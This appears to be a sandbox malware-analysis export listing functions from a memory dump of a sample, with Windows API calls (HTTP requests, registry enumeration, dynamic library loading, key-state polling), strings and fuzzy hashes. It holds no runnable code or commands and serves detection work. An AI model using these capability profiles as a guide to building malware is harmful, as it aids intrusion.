Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 79717a2d8b6e48f292a65fc41a886c457e26539e9558fb77602c78b8ff8d154e
Instruction ID: 80044b39f4171986f985088bbcbbe23a84a920daca0f842056ae691824adadae
Opcode Fuzzy Hash: 79717a2d8b6e48f292a65fc41a886c457e26539e9558fb77602c78b8ff8d154e
Instruction Fuzzy Hash: DE319034600109AFEF209F58DC85FB87BE5EB07310F9441B6FA55E72A1CE7199409762

Function 00B8D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B8D7C5

Part of subcall function 00B1784B: _memmove.LIBCMT ref: 00B17899

Strings

cdecl, xrefs: 00B8D81C
stdcall, xrefs: 00B8D847
winapi, xrefs: 00B8D836
none, xrefs: 00B8D8A0

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 2c86d50e03d9ddc46dd5f7b8f9552e601afb415de3e81051a2c4be670e0a814d
Instruction ID: 58df4e0cbeedc77269125b5360824430c1917691e750ff46a0ad7b1451dd36dd
Opcode Fuzzy Hash: 2c86d50e03d9ddc46dd5f7b8f9552e601afb415de3e81051a2c4be670e0a814d
Instruction Fuzzy Hash: DD31B071904619ABCF00EF58CC559FEB3F8FF54320F1086AAE825A76E1DB31A905CB90

Function 00B8182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B8184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B81872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B818A2
InternetCloseHandle.WININET(00000000), ref: 00B818E9

Part of subcall function 00B82483: GetLastError.KERNEL32(?,?,00B81817,00000000,00000000,00000001), ref: 00B82498
Part of subcall function 00B82483: SetEvent.KERNEL32(?,?,00B81817,00000000,00000000,00000001), ref: 00B824AD

Strings

, xrefs: 00B81893

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 25e59dacdf021b6670cd9573994eb122ebc4e43147d1acb64018cb729af57372
Instruction ID: b3a0d8de44c5ad3fd0aed3d7fec61ed625472958936928d65b1bc7ed78241366
Opcode Fuzzy Hash: 25e59dacdf021b6670cd9573994eb122ebc4e43147d1acb64018cb729af57372
Instruction Fuzzy Hash: ED21BEB1501208BFEB11AFA8CC86EBB77EDEB48754F10456AF905E3250EB248D0697B0

Function 00B963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B11D73
Part of subcall function 00B11D35: GetStockObject.GDI32(00000011), ref: 00B11D87
Part of subcall function 00B11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B11D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B96461
LoadLibraryW.KERNEL32(?), ref: 00B96468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B9647D
DestroyWindow.USER32(?), ref: 00B96485

Strings

SysAnimate32, xrefs: 00B9643C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 405072477d6fff977342b75cf7ae8fe63112d0ff2a3a4a9ecfd86ec4f67cfae0
Instruction ID: 21bb7d580d3d8e5f088acb2bf20ec1ea950979296347de8826bbd4e80e5e9623
Opcode Fuzzy Hash: 405072477d6fff977342b75cf7ae8fe63112d0ff2a3a4a9ecfd86ec4f67cfae0
Instruction Fuzzy Hash: 9D218B71200205BBEF104FA4DC80EBA77E9EB59724F204679FA1093291D7719C519760

Function 00B76D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B76DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B76DEF
GetStdHandle.KERNEL32(0000000C), ref: 00B76E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B76E3B

Strings

nul, xrefs: 00B76E36

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e2a35fb5d0358ba2252c3b2280e802519fff90a708bbd1ac1d1f9d4698532139
Instruction ID: 9ad74f5da9a5bb984b6055fc76c016eca312af733721c47b02191514ba0e6364
Opcode Fuzzy Hash: e2a35fb5d0358ba2252c3b2280e802519fff90a708bbd1ac1d1f9d4698532139
Instruction Fuzzy Hash: 8321957460060AAFDB309F29DC44B997BF4EF44720F2086AAFDB5D72D0DB7099509B60

Function 00B76E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B76E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B76EBB
GetStdHandle.KERNEL32(000000F6), ref: 00B76ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B76F06

Strings

nul, xrefs: 00B76F01

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f63e66528ad9ac6f6b668ebacce3d61057facdbe9dcf35421083b43afc6a24c4
Instruction ID: 59a568605fed02e993a413f55ff5c0310f4c8f6d68edd61e6acd2c2b2e798202
Opcode Fuzzy Hash: f63e66528ad9ac6f6b668ebacce3d61057facdbe9dcf35421083b43afc6a24c4
Instruction Fuzzy Hash: A221B6755007069FDB209F69DC44AAA77E8EF45730F208A9AFCB5D72D0DB70A850CB61

Function 00B7AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B7ACA8
__swprintf.LIBCMT ref: 00B7ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B9F910), ref: 00B7ACFF

Strings

%lu, xrefs: 00B7ACBB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c6362a02572202bf69b8accc2be48ab44aff77b27df0098e90c3de669175d7b9
Instruction ID: 92886fcc068105ba2c89538135c5a25612b3e7a3ad42ed0f1f8d37576b603387
Opcode Fuzzy Hash: c6362a02572202bf69b8accc2be48ab44aff77b27df0098e90c3de669175d7b9
Instruction Fuzzy Hash: 54214131A00109EFCB10DF65CD85EEE7BF8EF89714B1044A9F909EB251DA31EA45DB61

Function 00B71AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B71B19

Strings

REMOVE, xrefs: 00B71B1F
KEYS, xrefs: 00B71B30
EXISTS, xrefs: 00B71B41
APPEND, xrefs: 00B71B52

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 6812b1c4d61611a7d33dd853ea46ede27e29ab9594581a2012b1c3a1dc5b2f5f
Instruction ID: 033602dbaddb0ed5e0205c5b7e60fec756506c7c92166c40116a152259a8eb21
Opcode Fuzzy Hash: 6812b1c4d61611a7d33dd853ea46ede27e29ab9594581a2012b1c3a1dc5b2f5f
Instruction Fuzzy Hash: E2110C319102099BCF00EF68D8619EEB7F4FF65304F6488E9D829A7691EB325906CB54

Function 00B8EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B8EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B8EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B8ED6A
CloseHandle.KERNEL32(?), ref: 00B8EDEB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 5a2054a99733e5c5156f4f0796427d1a9393da2288b90d283f1f601c26b2a205
Instruction ID: 5416994ddb5423ae1f1b4d59e82b3dfe5afc40a84eae715625d0c7f6974bee16
Opcode Fuzzy Hash: 5a2054a99733e5c5156f4f0796427d1a9393da2288b90d283f1f601c26b2a205
Instruction Fuzzy Hash: 67816D716043009FD720EF28C896F6AB7E5AF48710F54886DF9A99B2D2DA70ED41CB91

Function 00B90037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8FDAD,?,?), ref: 00B90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B900FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B9013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B90183
RegCloseKey.ADVAPI32(?,?), ref: 00B901AF
RegCloseKey.ADVAPI32(00000000), ref: 00B901BC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: b00e2f9d973e7ba046b8b5fb0d302f25a158317405b29362717af9989dc7ea02
Instruction ID: 106443c885f6eb7128a377b3390ac4567f42039957369a56ac64934145be4316
Opcode Fuzzy Hash: b00e2f9d973e7ba046b8b5fb0d302f25a158317405b29362717af9989dc7ea02
Instruction Fuzzy Hash: A4518D31218204AFCB14EF68CC81FAAB7E9FF84314F40896DF595972A2DB31E944CB52

Function 00B8D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B8D927
GetProcAddress.KERNEL32(00000000,?), ref: 00B8D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B8D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00B8DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B8DA21

Part of subcall function 00B15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B77896,?,?,00000000), ref: 00B15A2C
Part of subcall function 00B15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B77896,?,?,00000000,?,?), ref: 00B15A50

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 0b48f78ce1ded17f0f2e12c8e10bc9fbd753e9d39090cfd8320d009ead080a8c
Instruction ID: 585c870944615b8832f0a31bdd95aea97d5489f186aafee53998469fd62e9c3f
Opcode Fuzzy Hash: 0b48f78ce1ded17f0f2e12c8e10bc9fbd753e9d39090cfd8320d009ead080a8c
Instruction Fuzzy Hash: 05512B35A04209DFCB04EFA8C4949ADB7F5FF49320B5480A6E955AB362DB30EE45CF91

Function 00B7E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B7E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B7E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B7E687

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B7E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B7E6B4

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 968d0bde41c74a4d52d80d66194845404f590d98b17d14859af14f1928f313ef
Instruction ID: 503b4f66d88e94518f4325f2c542c28a8d029ff8372ef464949542ae3700fa01
Opcode Fuzzy Hash: 968d0bde41c74a4d52d80d66194845404f590d98b17d14859af14f1928f313ef
Instruction Fuzzy Hash: 5851EA35A00109DFCB01EF64C991AAEBBF5EF49354F1480A9E819AB362CB31EE51DB51

Function 00B12344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B12357
ScreenToClient.USER32(00BD57B0,?), ref: 00B12374
GetAsyncKeyState.USER32(00000001), ref: 00B12399
GetAsyncKeyState.USER32(00000002), ref: 00B123A7

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ed80e399ed9df90ed953bf46f1ebf8787757c7bc98893c1447aa77ea034750a2
Instruction ID: 7bc2d7fefbf4b0c4c96fda505a12cf94fabe57b967d9d38a03764c27ba37019b
Opcode Fuzzy Hash: ed80e399ed9df90ed953bf46f1ebf8787757c7bc98893c1447aa77ea034750a2
Instruction Fuzzy Hash: EE418635504115FFCF199F68D844AEDBBB4FB05360F6043A6F839922A0CB349A94EF95

Function 00B663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B663E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00B66433
TranslateMessage.USER32(?), ref: 00B6645C
DispatchMessageW.USER32(?), ref: 00B66466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B66475

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: c8e325cdde0c9b05ae41c0ba825f353a534221c6d1db85e81ef4c72b589b176c
Instruction ID: 3bad3f9f02af45abcc2d07fbab7c74bfcf4d4d4838d0effa2378c68af9b90a8c
Opcode Fuzzy Hash: c8e325cdde0c9b05ae41c0ba825f353a534221c6d1db85e81ef4c72b589b176c
Instruction Fuzzy Hash: 69318371901646AFDB64CFB5DC94BF6BBE8EB01310F1401A6E425C32A1FF29D889DB60

Function 00B68A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B68A30
PostMessageW.USER32(?,00000201,00000001), ref: 00B68ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B68AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00B68AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B68AF8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 922ce9a312499f964bd5e3c262e54b41924a6dc69f6099dc66af7c71e4f97d9c
Instruction ID: 7fb0d93152fbd348d6903d2633e1a758491f70c360ea6e68aeeb188809c552d2
Opcode Fuzzy Hash: 922ce9a312499f964bd5e3c262e54b41924a6dc69f6099dc66af7c71e4f97d9c
Instruction Fuzzy Hash: F731C071500219EFDF14CFA8D94CAAE3BB5EB04325F10826AF925E71D1CBB49954DB90

Function 00B9B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

GetWindowLongW.USER32(?,000000F0), ref: 00B9B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B9B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B9B1CF
GetSystemMetrics.USER32(00000004), ref: 00B9B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B80E90,00000000), ref: 00B9B216

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: d6c0ac2ff21a53b37c26eb0d82697fb21d146ad046fabd86c161c59435c5486d
Instruction ID: 7a39a7b67f10408b8cbf5be67e613613b7c5dda2f024784a57756e6f034bdf81
Opcode Fuzzy Hash: d6c0ac2ff21a53b37c26eb0d82697fb21d146ad046fabd86c161c59435c5486d
Instruction Fuzzy Hash: 67218271620265AFCF209F38AD54E6A7BE4EB05321F114779F922D71E0E7309810DB90

Function 00B112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B1134D
SelectObject.GDI32(?,00000000), ref: 00B1135C
BeginPath.GDI32(?), ref: 00B11373
SelectObject.GDI32(?,00000000), ref: 00B1139C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6a01d5638ac28216d8d41bd7da03c72fa7b83fb2b13ff2416de4a55f2a5d7999
Instruction ID: cac648a33d3a2e7e676b951aafed8e6658875840a97a057673e8fc4027977f26
Opcode Fuzzy Hash: 6a01d5638ac28216d8d41bd7da03c72fa7b83fb2b13ff2416de4a55f2a5d7999
